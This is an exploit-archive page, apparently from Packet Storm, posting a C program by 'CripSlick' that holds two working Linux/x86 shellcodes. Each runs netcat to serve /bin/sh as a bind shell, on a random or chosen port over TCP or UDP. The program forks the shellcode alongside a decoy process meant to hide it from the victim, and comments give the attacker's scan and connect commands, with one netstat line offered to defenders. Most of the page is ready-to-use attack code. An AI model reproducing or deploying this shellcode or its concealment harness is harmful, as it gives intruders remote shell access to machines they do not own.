what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x86 NetCat Bind Shell With Port Shellcode

Linux/x86 NetCat Bind Shell With Port Shellcode
Posted Aug 2, 2016
Authored by CripSlick

44, 52 bytes Linux/x86 NetCat bind shell with port shellcode.

tags | shell, x86, shellcode
systems | linux
SHA-256 | d3b7d912c04cefa1326935cd7d9db1c97b626cd012e0f44b92ac0445820ed834

Linux/x86 NetCat Bind Shell With Port Shellcode

Change Mirror Download
#include <stdio.h>
#include <string.h>
#include <unistd.h> //| needed for C "fork"
#include <stdlib.h> //| needed for C "system"


//| Exploit Title: [Linux x86 NetCat bind shell with Port (44, 52 bytes)]
//| Date: [7/28/2016]
//| Exploit Author: [CripSlick]
//| Tested on: [Kali 2.0 x86]
//| Version: [NetCat v1.10-41]

//| ShepherdDowling@gmail.com
//| OffSec ID: OS-20614
//| http://50.112.22.183/


//|=====================================================================================================
//|================================ CripSlick's Short NetCat Bind Shell ================================
//|
//|
//| Why use CripSlick's NetCat Bind Shell?
//| Because it is short and that is about the only reason. If you can spare some bytes, I highly
//| suggest that you go with my Ncat Bind Shell that has the added benefits of SSL, persistent,
//| multi-terminal with a password >>>>>>>>>>>>>> https://www.exploit-db.com/exploits/40061/
//| Or if you must only rely on syscalls, go >>>> https://www.exploit-db.com/exploits/40122/
//| for my bind shell that is also, persistent, multiterminal with a password (Ncat is better
//| due to SSL, so if you know the victim has it on their machine use it.)
//|
//|
//| Sometimes we don't have the luxury of being able to have the other goodies so you must make do
//| with a less powerful approach to at least get your foot in the door, and that is why I made this.
//|
//| Defender Bash Script
//| netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp"
//|
//| I came up with this bash script because I wanted to be able to see who was spying that included
//| TCP listening, TCP established, UDP listening, & UDP established.
//| I found it annoying that some people needed to run a new script for every state so I fixed that.
//| the "-A 50" means your bash script will hold up to 50 connections.
//| If you need more connections increase the number, and if the scan is slow, decrease the number.




#define PORT "\x39\x38" // FORWARD BYTE ORDER (ASCII TO HEX)
//| PORT:98

//| Specifying the PROTOCOL Only Applies to CODE2
//#define PROTOCOL "\x76\x76" // TCP & IS terminal visible
#define PROTOCOL "\x75\x75" // UDP & NOT terminal visible

//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!============================
//| ==============================================================================
//| CODE1 Random Port, real ghetto but only 44 bytes!!
//| ==============================================================================
//| Attacker Finds Port: nmap 10.1.1.4 -p-
//| Attacker Connects via TCP: nc <IP> <PORT>
//| Defender : netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp"


unsigned char CODE1[] = //replace CODE1 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

"\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x65\x2f\x62\x69\x68\x2d"
"\x6c\x76\x76\x89\xe6\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x56\x53\x89\xe1\xb0\x0b\xcd\x80"
;


//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!============================
//| ==============================================================================
//| CODE2 with port and still only 52 bytes
//| ==============================================================================
//| Attacker Connects via TCP: nc <IP> <PORT>
//| Attacker Connects via UDP: nc -u <IP> <PORT>
//| Defender : netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp"


unsigned char CODE2[] = //replace CODE2 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<


"\x31\xdb\xf7\xe3\x68\x2d\x70"PORT"\x89\xe7\x50\x68\x6e\x2f\x73\x68\x68"
"\x65\x2f\x62\x69\x68\x2d\x6c"PROTOCOL"\x89\xe6\x50\x68\x2f\x2f\x6e\x63"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80"
;



//|========================== VOID SHELLCODE ======================================
void SHELLCODE()
{
// This part floods the registers to make sure the shellcode will always run
__asm__("mov $0xAAAAAAAA, %eax\n\t"
"mov %eax, %ebx\n\t" "mov %eax, %ecx\n\t" "mov %eax, %edx\n\t"
"mov %eax, %esi\n\t" "mov %eax, %edi\n\t" "mov %eax, %ebp\n\t"
"call CODE2"); //1st CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
}

//|========================== VOID printBytes =====================================
void printBytes()
{
printf("CripSlick's code is %d Bytes Long\n",
strlen(CODE2)); //2nd CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
}


//|============================== Int main ========================================
int main ()
{

// IMPORTANT> replace CODEX the "unsigned char" variable above
// > This needs to be done twice (for string count + code to use)

int pid = fork(); // fork start
if(pid == 0){ // pid always starts at 0

SHELLCODE(); // launch void SHELLCODE
// this is to represent a scenario where you bind to a good program
// you always want your shellcode to run first

}else if(pid > 0){ // pid will always be greater than 0 after the 1st process
// this argument will always be satisfied

printBytes(); // launch printBYTES
// pretend that this is the one the victim thinks he is only using
}
return 0; // satisfy int main
system("exit"); // keeps our shellcode a daemon. This only works with C0DE2 as UDP
}


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close